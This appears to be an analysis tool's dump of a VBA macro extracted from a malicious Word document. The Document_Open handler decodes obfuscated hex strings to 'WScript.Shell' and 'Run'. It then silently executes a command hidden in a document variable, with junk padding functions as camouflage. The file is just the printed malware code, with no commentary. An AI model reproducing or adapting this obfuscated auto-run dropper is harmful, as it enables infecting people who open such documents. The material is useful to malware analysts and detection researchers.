Filename     : ./macros/937fe474b4f03c153f413827a3c5906eaab40cd33e787feb8e6ccfb4d5d77bf6
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function LAHQIYWO() As String
Dim aLAHQIYWO As String
aLAHQIYWO = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myLAHQIYWO = aLAHQIYWO
Dim myMsgBox(Right(aLAHQIYWO & myLAHQIYWO, 28))
End Function

Public Sub Document_Open()
    Application.Run UGL_X("ABA79596A698B0A394")
End Sub
Private Function HDVDYZIL() As String
Dim aHDVDYZIL As String
aHDVDYZIL = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myHDVDYZIL = aHDVDYZIL
Dim myMsgBox(Right(aHDVDYZIL & myHDVDYZIL, 28))
End Function

Sub ZVDEUG_RC()
    BFV_H
End Sub
Private Function TKHGHOSG() As String
Dim aTKHGHOSG As String
aTKHGHOSG = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myTKHGHOSG = aTKHGHOSG
Dim myMsgBox(Right(aTKHGHOSG & myTKHGHOSG, 28))
End Function

Public Sub BFV_H()
    Dim Q_I As Object: Set Q_I = VBA.CreateObject(UGL_X("A8A4B4C3BAC1C57FA4B9B6BDBD"))
    CallByName Q_I, UGL_X("A3C6BF"), VbMethod, UGL_X(ActiveDocument.Variables("QOFZC").Value), 0, True
End Sub
Private Function ZWVOPWCK() As String
Dim aZWVOPWCK As String
aZWVOPWCK = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myZWVOPWCK = aZWVOPWCK
Dim myMsgBox(Right(aZWVOPWCK & myZWVOPWCK, 28))
End Function

Sub Workbook_Open()
    Application.Run "ThisWorkbook." & UGL_X("ABA79596A698B0A394")
End Sub
Private Function LSHWCUFT() As String
Dim aLSHWCUFT As String
aLSHWCUFT = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myLSHWCUFT = aLSHWCUFT
Dim myMsgBox(Right(aLSHWCUFT & myLSHWCUFT, 28))
End Function

Public Function UGL_X(ByVal Q_I As String)
   Dim NRA_VZ As String
   Dim BFZ_OAK As Long
   For BFZ_OAK = 1 To Len(Q_I) Step 2
        NRA_VZ = NRA_VZ & Chr(CLng(Chr(38) & Chr(72) & Mid(Q_I, BFZ_OAK, 2)) - 81)
   Next
   UGL_X = NRA_VZ
End Function
Private Function XAQDHRJE() As String
Dim aXAQDHRJE As String
aXAQDHRJE = "66666637664E6697585E7F66496C9F70666B2C66548633664631666666668635853D66373A27A634676666662E6666278C666645667A966666666666"
Dim myXAQDHRJE = aXAQDHRJE
Dim myMsgBox(Right(aXAQDHRJE & myXAQDHRJE, 28))
End Function


